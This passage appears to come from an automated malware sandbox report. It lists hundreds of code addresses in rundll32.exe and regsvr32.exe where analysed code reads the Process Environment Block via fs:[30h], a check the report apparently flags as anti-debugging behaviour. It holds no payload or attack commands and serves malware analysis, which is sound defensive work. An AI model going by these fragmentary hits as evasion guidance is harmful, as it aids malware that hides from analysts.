Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AB430 mov edx, dword ptr fs:[00000030h]	14_2_7F3AB430
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AB430 mov eax, dword ptr fs:[00000030h]	14_2_7F3AB430
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AB430 mov ecx, dword ptr fs:[00000030h]	14_2_7F3AB430
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F396330 mov ecx, dword ptr fs:[00000030h]	14_2_7F396330
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AE390 mov edx, dword ptr fs:[00000030h]	14_2_7F3AE390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3E7E46 mov eax, dword ptr fs:[00000030h]	14_2_7F3E7E46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3E7EBB mov eax, dword ptr fs:[00000030h]	14_2_7F3E7EBB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F356D10 mov eax, dword ptr fs:[00000030h]	14_2_7F356D10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F377DB0 mov eax, dword ptr fs:[00000030h]	14_2_7F377DB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F356DAA mov eax, dword ptr fs:[00000030h]	14_2_7F356DAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F37BC30 mov edx, dword ptr fs:[00000030h]	14_2_7F37BC30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F37BC30 mov eax, dword ptr fs:[00000030h]	14_2_7F37BC30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3A9C60 mov eax, dword ptr fs:[00000030h]	14_2_7F3A9C60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F356B00 mov edx, dword ptr fs:[00000030h]	14_2_7F356B00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F394B90 mov ecx, dword ptr fs:[00000030h]	14_2_7F394B90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F376B80 mov edx, dword ptr fs:[00000030h]	14_2_7F376B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F377A60 mov edx, dword ptr fs:[00000030h]	14_2_7F377A60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3CFA90 mov eax, dword ptr fs:[00000030h]	14_2_7F3CFA90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F373992 mov edx, dword ptr fs:[00000030h]	14_2_7F373992
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3848E0 mov ecx, dword ptr fs:[00000030h]	14_2_7F3848E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AA730 mov ecx, dword ptr fs:[00000030h]	14_2_7F3AA730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AA730 mov eax, dword ptr fs:[00000030h]	14_2_7F3AA730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AA730 mov ecx, dword ptr fs:[00000030h]	14_2_7F3AA730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F369790 mov edx, dword ptr fs:[00000030h]	14_2_7F369790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F369790 mov ecx, dword ptr fs:[00000030h]	14_2_7F369790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F369790 mov ecx, dword ptr fs:[00000030h]	14_2_7F369790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F354664 mov ecx, dword ptr fs:[00000030h]	14_2_7F354664
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F354664 mov ecx, dword ptr fs:[00000030h]	14_2_7F354664
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F354664 mov edx, dword ptr fs:[00000030h]	14_2_7F354664
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AE570 mov eax, dword ptr fs:[00000030h]	14_2_7F3AE570
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F37757D mov eax, dword ptr fs:[00000030h]	14_2_7F37757D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AD5B0 mov ecx, dword ptr fs:[00000030h]	14_2_7F3AD5B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AD5B0 mov eax, dword ptr fs:[00000030h]	14_2_7F3AD5B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AD5B0 mov ecx, dword ptr fs:[00000030h]	14_2_7F3AD5B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AD5B0 mov edx, dword ptr fs:[00000030h]	14_2_7F3AD5B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AD5B0 mov eax, dword ptr fs:[00000030h]	14_2_7F3AD5B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AC340 mov eax, dword ptr fs:[00000030h]	14_2_7F3AC340
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AE380 mov eax, dword ptr fs:[00000030h]	14_2_7F3AE380
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F37C230 mov eax, dword ptr fs:[00000030h]	14_2_7F37C230
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3AB130 mov eax, dword ptr fs:[00000030h]	14_2_7F3AB130
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F354110 mov edx, dword ptr fs:[00000030h]	14_2_7F354110
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F354110 mov ecx, dword ptr fs:[00000030h]	14_2_7F354110
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F354110 mov ecx, dword ptr fs:[00000030h]	14_2_7F354110
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F354110 mov ecx, dword ptr fs:[00000030h]	14_2_7F354110
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F354110 mov ecx, dword ptr fs:[00000030h]	14_2_7F354110
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F354110 mov edx, dword ptr fs:[00000030h]	14_2_7F354110
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F354174 mov edx, dword ptr fs:[00000030h]	14_2_7F354174
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F354174 mov ecx, dword ptr fs:[00000030h]	14_2_7F354174
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F357160 mov edx, dword ptr fs:[00000030h]	14_2_7F357160
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3551EF mov edx, dword ptr fs:[00000030h]	14_2_7F3551EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3551EF mov ecx, dword ptr fs:[00000030h]	14_2_7F3551EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3551EF mov eax, dword ptr fs:[00000030h]	14_2_7F3551EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3551EF mov edx, dword ptr fs:[00000030h]	14_2_7F3551EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3551EF mov edx, dword ptr fs:[00000030h]	14_2_7F3551EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3551EF mov edx, dword ptr fs:[00000030h]	14_2_7F3551EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBAF80 mov edx, dword ptr fs:[00000030h]	18_2_7EDBAF80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBE860 mov ecx, dword ptr fs:[00000030h]	18_2_7EDBE860
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED83972 mov edx, dword ptr fs:[00000030h]	18_2_7ED83972
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBB430 mov ecx, dword ptr fs:[00000030h]	18_2_7EDBB430
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBB430 mov eax, dword ptr fs:[00000030h]	18_2_7EDBB430
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBB430 mov edx, dword ptr fs:[00000030h]	18_2_7EDBB430
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBB430 mov eax, dword ptr fs:[00000030h]	18_2_7EDBB430
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBB430 mov ecx, dword ptr fs:[00000030h]	18_2_7EDBB430
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov ecx, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov edx, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov eax, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov ecx, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov ecx, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov ecx, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov eax, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov ecx, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov edx, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov eax, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov eax, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov edx, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov ecx, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov ecx, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov eax, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC4560 mov edx, dword ptr fs:[00000030h]	18_2_7EDC4560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBE390 mov edx, dword ptr fs:[00000030h]	18_2_7EDBE390
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDA6330 mov ecx, dword ptr fs:[00000030h]	18_2_7EDA6330
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED86ED0 mov edx, dword ptr fs:[00000030h]	18_2_7ED86ED0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDF7E8A mov eax, dword ptr fs:[00000030h]	18_2_7EDF7E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDF7EBB mov eax, dword ptr fs:[00000030h]	18_2_7EDF7EBB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDF7E46 mov eax, dword ptr fs:[00000030h]	18_2_7EDF7E46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9AE30 mov edx, dword ptr fs:[00000030h]	18_2_7ED9AE30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9AE30 mov ecx, dword ptr fs:[00000030h]	18_2_7ED9AE30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9AE30 mov eax, dword ptr fs:[00000030h]	18_2_7ED9AE30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9AE30 mov eax, dword ptr fs:[00000030h]	18_2_7ED9AE30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9AE30 mov eax, dword ptr fs:[00000030h]	18_2_7ED9AE30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9AE30 mov eax, dword ptr fs:[00000030h]	18_2_7ED9AE30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9AE30 mov eax, dword ptr fs:[00000030h]	18_2_7ED9AE30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9AE30 mov edx, dword ptr fs:[00000030h]	18_2_7ED9AE30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9AE30 mov eax, dword ptr fs:[00000030h]	18_2_7ED9AE30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC7F60 mov ecx, dword ptr fs:[00000030h]	18_2_7EDC7F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC7F60 mov edx, dword ptr fs:[00000030h]	18_2_7EDC7F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC7F60 mov eax, dword ptr fs:[00000030h]	18_2_7EDC7F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC7F60 mov ecx, dword ptr fs:[00000030h]	18_2_7EDC7F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDF0C78 mov ecx, dword ptr fs:[00000030h]	18_2_7EDF0C78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDB9C60 mov eax, dword ptr fs:[00000030h]	18_2_7EDB9C60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED8BC30 mov edx, dword ptr fs:[00000030h]	18_2_7ED8BC30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED8BC30 mov eax, dword ptr fs:[00000030h]	18_2_7ED8BC30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED87DB0 mov eax, dword ptr fs:[00000030h]	18_2_7ED87DB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED66DAA mov eax, dword ptr fs:[00000030h]	18_2_7ED66DAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED66D10 mov eax, dword ptr fs:[00000030h]	18_2_7ED66D10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED97AE0 mov edx, dword ptr fs:[00000030h]	18_2_7ED97AE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED97AE0 mov edx, dword ptr fs:[00000030h]	18_2_7ED97AE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED97AE0 mov edx, dword ptr fs:[00000030h]	18_2_7ED97AE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED97AE0 mov eax, dword ptr fs:[00000030h]	18_2_7ED97AE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED97AE0 mov edx, dword ptr fs:[00000030h]	18_2_7ED97AE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED97AE0 mov ecx, dword ptr fs:[00000030h]	18_2_7ED97AE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED97AE0 mov ecx, dword ptr fs:[00000030h]	18_2_7ED97AE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED97AE0 mov ecx, dword ptr fs:[00000030h]	18_2_7ED97AE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED97AE0 mov edx, dword ptr fs:[00000030h]	18_2_7ED97AE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDDFA90 mov eax, dword ptr fs:[00000030h]	18_2_7EDDFA90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC8A40 mov ecx, dword ptr fs:[00000030h]	18_2_7EDC8A40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC8A40 mov edx, dword ptr fs:[00000030h]	18_2_7EDC8A40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC8A40 mov eax, dword ptr fs:[00000030h]	18_2_7EDC8A40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDC8A40 mov ecx, dword ptr fs:[00000030h]	18_2_7EDC8A40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED87A60 mov edx, dword ptr fs:[00000030h]	18_2_7ED87A60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9EA10 mov ecx, dword ptr fs:[00000030h]	18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9EA10 mov ecx, dword ptr fs:[00000030h]	18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9EA10 mov eax, dword ptr fs:[00000030h]	18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9EA10 mov eax, dword ptr fs:[00000030h]	18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9EA10 mov eax, dword ptr fs:[00000030h]	18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9EA10 mov eax, dword ptr fs:[00000030h]	18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9EA10 mov eax, dword ptr fs:[00000030h]	18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9EA10 mov ecx, dword ptr fs:[00000030h]	18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9EA10 mov edx, dword ptr fs:[00000030h]	18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9EA10 mov ecx, dword ptr fs:[00000030h]	18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9EA10 mov eax, dword ptr fs:[00000030h]	18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9EA10 mov ecx, dword ptr fs:[00000030h]	18_2_7ED9EA10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDA4B90 mov ecx, dword ptr fs:[00000030h]	18_2_7EDA4B90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED86B80 mov edx, dword ptr fs:[00000030h]	18_2_7ED86B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDA0B80 mov eax, dword ptr fs:[00000030h]	18_2_7EDA0B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDA0B80 mov edx, dword ptr fs:[00000030h]	18_2_7EDA0B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDA0B80 mov eax, dword ptr fs:[00000030h]	18_2_7EDA0B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDA0B80 mov eax, dword ptr fs:[00000030h]	18_2_7EDA0B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDA0B80 mov eax, dword ptr fs:[00000030h]	18_2_7EDA0B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDA0B80 mov eax, dword ptr fs:[00000030h]	18_2_7EDA0B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDA0B80 mov eax, dword ptr fs:[00000030h]	18_2_7EDA0B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDA0B80 mov ecx, dword ptr fs:[00000030h]	18_2_7EDA0B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDA0B80 mov edx, dword ptr fs:[00000030h]	18_2_7EDA0B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDA0B80 mov eax, dword ptr fs:[00000030h]	18_2_7EDA0B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED66B00 mov edx, dword ptr fs:[00000030h]	18_2_7ED66B00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED948E0 mov ecx, dword ptr fs:[00000030h]	18_2_7ED948E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED64664 mov ecx, dword ptr fs:[00000030h]	18_2_7ED64664
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED64664 mov ecx, dword ptr fs:[00000030h]	18_2_7ED64664
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED64664 mov edx, dword ptr fs:[00000030h]	18_2_7ED64664
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED79790 mov edx, dword ptr fs:[00000030h]	18_2_7ED79790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED79790 mov ecx, dword ptr fs:[00000030h]	18_2_7ED79790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED79790 mov ecx, dword ptr fs:[00000030h]	18_2_7ED79790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9C790 mov edx, dword ptr fs:[00000030h]	18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9C790 mov ecx, dword ptr fs:[00000030h]	18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9C790 mov eax, dword ptr fs:[00000030h]	18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9C790 mov eax, dword ptr fs:[00000030h]	18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9C790 mov eax, dword ptr fs:[00000030h]	18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9C790 mov eax, dword ptr fs:[00000030h]	18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9C790 mov eax, dword ptr fs:[00000030h]	18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9C790 mov ecx, dword ptr fs:[00000030h]	18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9C790 mov ecx, dword ptr fs:[00000030h]	18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9C790 mov eax, dword ptr fs:[00000030h]	18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9C790 mov ecx, dword ptr fs:[00000030h]	18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9C790 mov ecx, dword ptr fs:[00000030h]	18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED9C790 mov ecx, dword ptr fs:[00000030h]	18_2_7ED9C790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBA730 mov ecx, dword ptr fs:[00000030h]	18_2_7EDBA730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBA730 mov eax, dword ptr fs:[00000030h]	18_2_7EDBA730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBA730 mov ecx, dword ptr fs:[00000030h]	18_2_7EDBA730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED994D0 mov ecx, dword ptr fs:[00000030h]	18_2_7ED994D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED994D0 mov ecx, dword ptr fs:[00000030h]	18_2_7ED994D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED994D0 mov eax, dword ptr fs:[00000030h]	18_2_7ED994D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED994D0 mov eax, dword ptr fs:[00000030h]	18_2_7ED994D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED994D0 mov eax, dword ptr fs:[00000030h]	18_2_7ED994D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED994D0 mov eax, dword ptr fs:[00000030h]	18_2_7ED994D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED994D0 mov eax, dword ptr fs:[00000030h]	18_2_7ED994D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED994D0 mov eax, dword ptr fs:[00000030h]	18_2_7ED994D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED994D0 mov eax, dword ptr fs:[00000030h]	18_2_7ED994D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBD5B0 mov ecx, dword ptr fs:[00000030h]	18_2_7EDBD5B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBD5B0 mov eax, dword ptr fs:[00000030h]	18_2_7EDBD5B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBD5B0 mov ecx, dword ptr fs:[00000030h]	18_2_7EDBD5B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBD5B0 mov edx, dword ptr fs:[00000030h]	18_2_7EDBD5B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBD5B0 mov eax, dword ptr fs:[00000030h]	18_2_7EDBD5B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBE570 mov eax, dword ptr fs:[00000030h]	18_2_7EDBE570
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED8C230 mov eax, dword ptr fs:[00000030h]	18_2_7ED8C230
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED87220 mov edx, dword ptr fs:[00000030h]	18_2_7ED87220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED87220 mov eax, dword ptr fs:[00000030h]	18_2_7ED87220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBE380 mov eax, dword ptr fs:[00000030h]	18_2_7EDBE380
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBC340 mov eax, dword ptr fs:[00000030h]	18_2_7EDBC340
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED8E66B mov ecx, dword ptr fs:[00000030h]	18_2_7ED8E66B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED8E66B mov ecx, dword ptr fs:[00000030h]	18_2_7ED8E66B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED64174 mov edx, dword ptr fs:[00000030h]	18_2_7ED64174
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED64174 mov ecx, dword ptr fs:[00000030h]	18_2_7ED64174
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED67160 mov edx, dword ptr fs:[00000030h]	18_2_7ED67160
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED64110 mov edx, dword ptr fs:[00000030h]	18_2_7ED64110
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED64110 mov ecx, dword ptr fs:[00000030h]	18_2_7ED64110
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED64110 mov ecx, dword ptr fs:[00000030h]	18_2_7ED64110
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED64110 mov ecx, dword ptr fs:[00000030h]	18_2_7ED64110
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED64110 mov ecx, dword ptr fs:[00000030h]	18_2_7ED64110
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7ED64110 mov edx, dword ptr fs:[00000030h]	18_2_7ED64110
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDBB130 mov eax, dword ptr fs:[00000030h]	18_2_7EDBB130
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBAF80 mov edx, dword ptr fs:[00000030h]	34_2_7EEBAF80
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC0DD0 mov ecx, dword ptr fs:[00000030h]	34_2_7EEC0DD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE828BF mov edx, dword ptr fs:[00000030h]	34_2_7EE828BF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBE860 mov ecx, dword ptr fs:[00000030h]	34_2_7EEBE860
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBB430 mov ecx, dword ptr fs:[00000030h]	34_2_7EEBB430
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBB430 mov eax, dword ptr fs:[00000030h]	34_2_7EEBB430
